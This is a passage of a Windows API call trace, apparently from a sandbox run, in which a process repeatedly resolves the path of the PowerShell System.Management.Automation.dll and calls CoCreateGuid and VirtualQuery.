RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dc34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.512] GetLastError () returned 0x0 [0050.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbe4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.512] GetLastError () returned 0x0 [0050.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dbe4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.512] GetLastError () returned 0x0 [0050.512] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x1f5d947c, Data2=0x6faa, Data3=0x41ee, Data4=([0]=0xb6, [1]=0xf1, [2]=0xcc, [3]=0x86, [4]=0xcc, [5]=0xd3, [6]=0xe9, [7]=0x88))) returned 0x0 [0050.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.512] GetLastError () returned 0x0 [0050.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.512] GetLastError () returned 0x0 [0050.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.512] GetLastError () returned 0x0 [0050.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.512] GetLastError () returned 0x0 [0050.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.512] GetLastError () returned 0x0 [0050.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.512] GetLastError () returned 0x0 [0050.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.513] GetLastError () returned 0x0 [0050.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.513] GetLastError () returned 0x0 [0050.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.513] GetLastError () returned 0x0 [0050.513] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xdc255e83, Data2=0xf18, Data3=0x4d94, Data4=([0]=0xbd, [1]=0xdc, [2]=0x9e, [3]=0x62, [4]=0x28, [5]=0xad, [6]=0x60, [7]=0x36))) returned 0x0 [0050.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.513] GetLastError () returned 0x0 [0050.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.513] GetLastError () returned 0x0 [0050.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.513] GetLastError () returned 0x0 [0050.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.513] GetLastError () returned 0x0 [0050.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.513] GetLastError () returned 0x0 [0050.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.514] GetLastError () returned 0x0 [0050.514] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x314197a, Data2=0xa1b6, Data3=0x4094, Data4=([0]=0x92, [1]=0xe4, [2]=0xe1, [3]=0xd0, [4]=0xfd, [5]=0xd1, [6]=0xa3, [7]=0xb0))) returned 0x0 [0050.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.514] GetLastError () returned 0x0 [0050.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.514] GetLastError () returned 0x0 [0050.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.514] GetLastError () returned 0x0 [0050.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.514] GetLastError () returned 0x0 [0050.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.514] GetLastError () returned 0x0 [0050.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.515] GetLastError () returned 0x0 [0050.515] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xf7fa38af, Data2=0xde, Data3=0x432e, Data4=([0]=0xad, [1]=0xf0, [2]=0xd0, [3]=0xf5, [4]=0x5a, [5]=0x1b, [6]=0x9, [7]=0xd2))) returned 0x0 [0050.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.515] GetLastError () returned 0x0 [0050.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.515] GetLastError () returned 0x0 [0050.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.515] GetLastError () returned 0x0 [0050.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.515] GetLastError () returned 0x0 [0050.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.515] GetLastError () returned 0x0 [0050.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.515] GetLastError () returned 0x0 [0050.516] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x355a74f5, Data2=0xfc45, Data3=0x4391, Data4=([0]=0xb7, [1]=0x7d, [2]=0x1b, [3]=0xcd, [4]=0x82, [5]=0x5e, [6]=0x59, [7]=0x9))) returned 0x0 [0050.516] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xb4bf5a92, Data2=0xb28b, Data3=0x4c7f, Data4=([0]=0x8d, [1]=0x51, [2]=0xa8, [3]=0xc5, [4]=0x55, [5]=0xe1, [6]=0x60, [7]=0x28))) returned 0x0 [0050.516] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x23b52a70, Data2=0x697d, Data3=0x4b94, Data4=([0]=0x8a, [1]=0xb9, [2]=0xc2, [3]=0x41, [4]=0x11, [5]=0x32, [6]=0x40, [7]=0x7))) returned 0x0 [0050.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.516] GetLastError () returned 0x0 [0050.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.516] GetLastError () returned 0x0 [0050.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.516] GetLastError () returned 0x0 [0050.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.516] GetLastError () returned 0x0 [0050.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.516] GetLastError () returned 0x0 [0050.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.516] GetLastError () returned 0x0 [0050.517] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xb86148b6, Data2=0xdd8f, Data3=0x4f43, Data4=([0]=0x87, [1]=0xfb, [2]=0x86, [3]=0xd5, [4]=0x6e, [5]=0xbe, [6]=0xdb, [7]=0x98))) returned 0x0 [0050.517] VirtualQuery (in: lpAddress=0x19cda4, lpBuffer=0x19dda4, dwLength=0x1c | out: lpBuffer=0x19dda4*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.517] GetLastError () returned 0x0 [0050.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.517] GetLastError () returned 0x0 [0050.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.517] GetLastError () returned 0x0 [0050.517] VirtualQuery (in: lpAddress=0x19cda4, lpBuffer=0x19dda4, dwLength=0x1c | out: lpBuffer=0x19dda4*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.518] VirtualQuery (in: lpAddress=0x19cde0, lpBuffer=0x19dde0, dwLength=0x1c | out: lpBuffer=0x19dde0*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d798, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.518] GetLastError () returned 0x0 [0050.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.518] GetLastError () returned 0x0 [0050.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.518] GetLastError () returned 0x0 [0050.518] VirtualQuery (in: lpAddress=0x19cda4, lpBuffer=0x19dda4, dwLength=0x1c | out: lpBuffer=0x19dda4*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.518] VirtualQuery (in: lpAddress=0x19cde0, lpBuffer=0x19dde0, dwLength=0x1c | out: lpBuffer=0x19dde0*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d798, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.518] GetLastError () returned 0x0 [0050.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.518] GetLastError () returned 0x0 [0050.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.518] GetLastError () returned 0x0 [0050.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.519] GetLastError () returned 0x0 [0050.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.519] GetLastError () returned 0x0 [0050.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0050.519] GetLastError () returned 0x0 [0050.519] VirtualQuery (in: lpAddress=0x19cda4, lpBuffer=0x19dda4, dwLength=0x1c | out: lpBuffer=0x19dda4*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.519] VirtualQuery (in: lpAddress=0x19cde0, lpBuffer=0x19dde0, dwLength=0x1c | out: lpBuffer=0x19dde0*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0050.522] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x7fe23dbf, Data2=0xc906, Data3=0x4a30, Data4=([0]=0x94, [1]=0xf8, [2]=0x1b, [3]=0xc2, [4]=0xbc, [5]=0x1e, [6]=0x6e, [7]=0x2d))) returned 0x0 [0050.525] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x62de546f, Data2=0x81d8, Data3=0x4066, Data4=([0]=0x9d, [1]=0xec, [2]=0x2e, [3]=0x13, [4]=0xaf, [5]=0xd4, [6]=0x6a, [7]=0xda))) returned 0x0 [0050.528] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xfea50880, Data2=0x68af, Data3=0x4d04, Data4=([0]=0xb4, [1]=0xec, [2]=0x60, [3]=0x2a, [4]=0x65, [5]=0xba, [6]=0xa9, [7]=0x7b))) returned 0x0 [0050.528] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x905f8f92, Data2=0xd24e, Data3=0x46bd, Data4=([0]=0x86, [1]=0xe2, [2]=0x46, [3]=0xb0, [4]=0xa0, [5]=0xd1, [6]=0x59, [7]=0xd6))) returned 0x0 [0050.528] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x5611ec2d, Data2=0xb122, Data3=0x4bc0, Data4=([0]=0x82, [1]=0x7f, [2]=0xf4, [3]=0x2c, [4]=0x9f, [5]=0x61, [6]=0x2d, [7]=0x1c))) returned 0x0 [0050.528] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xb9b195fb, Data2=0x669b, Data3=0x4028, Data4=([0]=0x9c, [1]=0x40, [2]=0xcb, [3]=0xad, [4]=0x66, [5]=0xb7, [6]=0xf2, [7]=0xef))) returned 0x0 [0050.529] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x4ba5b463, Data2=0x9a7b, Data3=0x484e, Data4=([0]=0xbb, [1]=0x52, [2]=0x30, [3]=0x24, [4]=0x6f, [5]=0xaf, [6]=0x27, [7]=0x0))) returned 0x0 [0050.529] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x67c44cba, Data2=0xaa2, Data3=0x47a0, 